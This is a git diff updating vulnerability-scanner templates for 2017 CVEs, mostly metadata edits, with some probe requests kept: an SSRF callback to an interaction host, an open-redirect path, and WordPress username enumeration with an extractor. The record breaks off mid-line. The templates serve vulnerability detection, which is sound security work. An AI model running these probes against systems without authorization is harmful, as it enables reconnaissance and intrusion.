+++ b/cves/2017/CVE-2017-17059.yaml
@@ -1,19 +1,20 @@
id: CVE-2017-17059
info:
- name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+ description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
reference:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+ - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-17059
cwe-id: CWE-79
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress
requests:
- method: POST
@@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml
index 57ff8ab681..643729ab6e 100644
--- a/cves/2017/CVE-2017-17451.yaml
+++ b/cves/2017/CVE-2017-17451.yaml
@@ -1,18 +1,21 @@
id: CVE-2017-17451
info:
- name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
+ name: WordPress Mailster <=1.5.4 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
+ description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
reference:
+ - https://wordpress.org/plugins/wp-mailster/#developers
+ - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html
+ - https://wpvulndb.com/vulnerabilities/8973
- https://nvd.nist.gov/vuln/detail/CVE-2017-17451
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-17451
cwe-id: CWE-79
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm
requests:
- method: GET
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index 5ae1957e4b..2bb55101ff 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -1,20 +1,23 @@
id: CVE-2017-17562
info:
- name: Embedthis GoAhead RCE
+ name: Embedthis GoAhead <3.6.5 - Remote Code Execution
author: geeknik
severity: high
- description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
+ description: |
+ description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
reference:
- https://www.elttam.com/blog/goahead/
- https://github.com/ivanitlearning/CVE-2017-17562
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
+ - https://github.com/embedthis/goahead/issues/249
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17562
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-17562
cwe-id: CWE-20
- tags: cve,cve2017,rce,goahead,fuzz
+ tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub
requests:
- raw:
@@ -95,12 +98,13 @@ requests:
matchers-condition: and
matchers:
+ - type: word
+ words:
+ - "environment variable"
+ - "display library search paths"
+ condition: and
+
- type: status
status:
- 200
-
- - type: word
- condition: and
- words:
- - "environment variable"
- - "display library search paths"
\ No newline at end of file
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml
index f10df9314d..dc40bd3e87 100644
--- a/cves/2017/CVE-2017-18024.yaml
+++ b/cves/2017/CVE-2017-18024.yaml
@@ -1,10 +1,10 @@
id: CVE-2017-18024
info:
- name: AvantFAX 3.3.3 XSS
+ name: AvantFAX 3.3.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
- description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
+ description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
reference:
- https://hackerone.com/reports/963798
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
@@ -14,7 +14,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2017-18024
cwe-id: CWE-79
- tags: cve,cve2017,xss,avantfax
+ tags: avantfax,hackerone,packetstorm,cve,cve2017,xss
requests:
- raw:
@@ -42,3 +42,5 @@ requests:
part: header
words:
- "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml
index d1ff0a60e6..4d105ea3b9 100644
--- a/cves/2017/CVE-2017-18536.yaml
+++ b/cves/2017/CVE-2017-18536.yaml
@@ -1,18 +1,20 @@
id: CVE-2017-18536
info:
- name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.
reference:
- https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
+ - https://wordpress.org/plugins/stop-user-enumeration/#developers
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-18536
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18536
cwe-id: CWE-79
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
@@ -34,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2017/CVE-2017-18598.yaml b/cves/2017/CVE-2017-18598.yaml
index 0c72ce02d6..974e3f8bae 100644
--- a/cves/2017/CVE-2017-18598.yaml
+++ b/cves/2017/CVE-2017-18598.yaml
@@ -1,35 +1,37 @@
-id: CVE-2017-18598
+id: CVE-2017-18598
-info:
- name: Qards Plugin - Stored XSS and SSRF
- author: pussycat0x
- severity: medium
- description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
- reference:
- - https://wpscan.com/vulnerability/8934
- - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
- - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
- tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
-
+info:
+ name: WordPress Qards - Cross-Site Scripting
+ author: pussycat0x
+ severity: medium
+ description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.
+ reference:
+ - https://wpscan.com/vulnerability/8934
+ - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
+ - https://wpvulndb.com/vulnerabilities/8934
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-18598
cwe-id: CWE-79
+ tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
-
- matchers-condition: and
- matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "http"
-
- - type: word
- part: body
- words:
- - "console.log"
\ No newline at end of file
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: body
+ words:
+ - "console.log"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml
index 4e1ca013f5..19af342c52 100644
--- a/cves/2017/CVE-2017-18638.yaml
+++ b/cves/2017/CVE-2017-18638.yaml
@@ -1,11 +1,11 @@
id: CVE-2017-18638
info:
- name: Graphite 'graphite.composer.views.send_email' SSRF
+ name: Graphite <=1.1.5 - Server-Side Request Forgery
author: huowuzhao
severity: high
- description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web
- server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
+ description: |
+ Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
reference:
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008
@@ -28,3 +28,5 @@ requests:
part: interactsh_protocol
words:
- "http"
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index d8e4d2cd0f..aeb8965d52 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -8,11 +8,13 @@ info:
reference:
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+ - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
+ - http://web.archive.org/web/20210124033731/https://www.securityfocus.com/bid/97884/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.4
cve-id: CVE-2017-3506
- tags: cve,cve2017,weblogic,oracle,rce,oast
+ tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle
requests:
- raw:
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
index 21895648c3..f4756f09b9 100644
--- a/cves/2017/CVE-2017-3528.yaml
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -4,30 +4,28 @@ info:
name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
author: 0x_Akoko
severity: medium
- description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3,
- 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction
- from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result
- in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
+ description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
reference:
- https://blog.zsec.uk/cve-2017-3528/
- https://www.exploit-db.com/exploits/43592
- https://nvd.nist.gov/vuln/detail/CVE-2017-3528
+ - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-3528
cwe-id: CWE-601
- tags: cve,cve2017,oracle,redirect
+ tags: oracle,redirect,edb,cve,cve2017
requests:
- method: GET
path:
- - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
+ - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
matchers:
- type: word
words:
- - 'noresize src="/\example.com?configName='
+ - 'noresize src="/\interact.sh?configName='
part: body
# Enhanced by mp on 2022/04/14
diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml
index ab883c8f87..12e351f92f 100644
--- a/cves/2017/CVE-2017-3881.yaml
+++ b/cves/2017/CVE-2017-3881.yaml
@@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-3881
cwe-id: CWE-20
- tags: cve,cve2017,cisco,rce,network
+ tags: cve2017,cisco,rce,network,kev,msf,cve
network:
- inputs:
diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml
index 77cda0cb40..2d27151229 100644
--- a/cves/2017/CVE-2017-4011.yaml
+++ b/cves/2017/CVE-2017-4011.yaml
@@ -1,14 +1,14 @@
id: CVE-2017-4011
info:
- name: McAfee NDLP User-Agent XSS
+ name: McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting
author: geeknik
severity: medium
- description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request.
+ description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
reference:
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-4011
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@@ -34,3 +34,5 @@ requests:
part: header
words:
- "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml
index bb3c5441ce..d33e90763b 100644
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -2,43 +2,55 @@ id: CVE-2017-5487
info:
name: WordPress Core < 4.7.1 - Username Enumeration
- author: Manas_Harsh,daffainfo,geeknik
+ author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
severity: medium
description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
reference:
- https://www.exploit-db.com/exploits/41497
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
+ - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/
+ - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2017-5487
cwe-id: CWE-200
- tags: cve,cve2017,wordpress
+ metadata:
+ shodan-query: http.component:"WordPress"
+ verified: "true"
+ tags: cve,cve2017,wordpress,wp,edb
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
stop-at-first-match: true
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - "application/json"
+
- type: word
+ part: body
words:
- '"id":'
- '"name":'
- '"avatar_urls":'
condition: and
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
+
extractors:
- type: json
+ part: body
+ name: "usernames"
json:
+ - '.[] | .slug'
- '.[].name'
-
-# Enahnced by mp 03/31/2022
diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml
index 08c8a6aa55..f14e526070 100644
--- a/cves/2017/CVE-2017-5521.yaml
+++ b/cves/2017/CVE-2017-5521.yaml
@@ -1,19 +1,23 @@
id: CVE-2017-5521
info:
- name: Bypassing Authentication on NETGEAR Routers
+ name: NETGEAR Routers - Authentication Bypass
author: princechaddha
severity: high
- description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
+ description: |
+ NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
reference:
- - https://www.cvedetails.com/cve/CVE-2017-5521/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
+ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
+ - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
+ - https://www.cvedetails.com/cve/CVE-2017-5521/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-5521
cwe-id: CWE-200
- tags: cve,cve2017,auth-bypass,netgear
+ tags: cve,cve2017,auth-bypass,netgear,router,kev
requests:
- method: GET
@@ -23,11 +27,14 @@ requests:
matchers-condition: and
matchers:
- type: word
+ part: body
words:
- "right\">Router\\s*Admin\\s*Username<"
- "right\">Router\\s*Admin\\s*Password<"
condition: and
- part: body
+
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-5631.yaml b/cves/2017/CVE-2017-5631.yaml
index 6dcc26746a..d8e29efb22 100644
--- a/cves/2017/CVE-2017-5631.yaml
+++ b/cves/2017/CVE-2017-5631.yaml
@@ -1,19 +1,20 @@
id: CVE-2017-5631
info:
- name: CaseAware - Cross Site Scripting
+ name: KMCIS CaseAware - Cross-Site Scripting
author: edoardottt
severity: medium
- description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string.
+ description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
reference:
+ - https://www.openbugbounty.org/incidents/228262/
+ - https://www.exploit-db.com/exploits/42042/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5631
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5631
cwe-id: CWE-79
- tags: cve,cve2017,xss,caseaware
+ tags: edb,cve,cve2017,xss,caseaware
requests:
- method: GET
@@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml
index 23bcd8bc85..5da6dbb20d 100644
--- a/cves/2017/CVE-2017-5638.yaml
+++ b/cves/2017/CVE-2017-5638.yaml
@@ -8,12 +8,14 @@ info:
reference:
- https://github.com/mazen160/struts-pwn
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
+ - https://isc.sans.edu/diary/22169
+ - https://github.com/rapid7/metasploit-framework/issues/8064
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-score: 10
cve-id: CVE-2017-5638
cwe-id: CWE-20
- tags: cve,cve2017,struts,rce,apache
+ tags: apache,kev,msf,cve,cve2017,struts,rce
requests:
- raw:
diff --git a/cves/2017/CVE-2017-5982.yaml b/cves/2017/CVE-2017-5982.yaml
index 8896ef3a05..0332b376c6 100644
--- a/cves/2017/CVE-2017-5982.yaml
+++ b/cves/2017/CVE-2017-5982.yaml
@@ -1,19 +1,21 @@
id: CVE-2017-5982
info:
- name: Kodi 17.1 Local File Inclusion
+ name: Kodi 17.1 - Local File Inclusion
author: 0x_Akoko
severity: high
- description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
+ description: |
+ Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.
reference:
- https://cxsecurity.com/issue/WLB-2017020164
- - https://www.cvedetails.com/cve/CVE-2017-5982
+ - https://www.exploit-db.com/exploits/41312/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-5982
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-5982
cwe-id: CWE-98
- tags: cve,cve2017,kodi,lfi
+ tags: cve2017,kodi,lfi,edb,cve
requests:
- method: GET
@@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml
index 0e8728cf90..2dc16ebb62 100644
--- a/cves/2017/CVE-2017-6090.yaml
+++ b/cves/2017/CVE-2017-6090.yaml
@@ -8,12 +8,15 @@ info:
reference:
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
+ - https://www.exploit-db.com/exploits/42934/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-6090
cwe-id: CWE-434
- tags: cve,cve2017,phpcollab,rce,fileupload
+ metadata:
+ shodan-query: http.title:"PhpCollab"
+ tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
requests:
- raw:
diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml
index c3897f688a..07f7419224 100644
--- a/cves/2017/CVE-2017-7269.yaml
+++ b/cves/2017/CVE-2017-7269.yaml
@@ -10,12 +10,13 @@ info:
- https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
- https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
- https://nvd.nist.gov/vuln/detail/CVE-2017-7269
+ - https://github.com/edwardz246003/IIS_exploit
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-7269
cwe-id: CWE-119
- tags: cve,cve2017,rce,windows,iis
+ tags: cve,cve2017,rce,windows,iis,kev
requests:
- method: OPTIONS
@@ -30,7 +31,6 @@ requests:
- "IIS/6.0"
- type: dsl
- part: header
dsl:
- regex("", dasl) # lowercase header name: DASL
- regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV
@@ -41,4 +41,5 @@ requests:
- type: status
status:
- 200
+
# Enhanced by mp on 2022/05/11
diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml
index 9113c6f453..0d5e78e67b 100644
--- a/cves/2017/CVE-2017-7391.yaml
+++ b/cves/2017/CVE-2017-7391.yaml
@@ -1,13 +1,15 @@
id: CVE-2017-7391
info:
- name: Magmi Cross-Site Scripting v.0.7.22
+ name: Magmi 0.7.22 - Cross-Site Scripting
author: pikpikcu
severity: medium
- description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
+ description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.
reference:
- https://github.com/dweeves/magmi-git/issues/522
- https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
+ - https://github.com/dweeves/magmi-git/pull/525
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-7391
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@@ -35,3 +37,5 @@ requests:
part: header
words:
- "text/html"
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml
index 304919ddbc..4181cd4b74 100644
--- a/cves/2017/CVE-2017-7615.yaml
+++ b/cves/2017/CVE-2017-7615.yaml
@@ -6,20 +6,23 @@ id: CVE-2017-7615
# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].
info:
- name: MantisBT <=2.30 - Arbitrary Password Reset and Unauthenticated Admin Access
+ name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access
author: bp0lr,dwisiswant0
severity: high
- description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
+ description: |
+ MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
reference:
- https://sourceforge.net/projects/mantisbt/files/mantis-stable/
- http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
- https://www.exploit-db.com/exploits/41890
+ - http://www.openwall.com/lists/oss-security/2017/04/16/2
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-7615
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-7615
cwe-id: CWE-640
- tags: cve,cve2017,mantisbt
+ tags: cve,cve2017,mantisbt,unauth,edb
requests:
- method: GET
@@ -34,10 +37,12 @@ requests:
matchers-condition: and
matchers:
- type: word
+ part: body
words:
- "?mimeType=text/html"
- - "{{BaseURL}}/api/jolokia/read |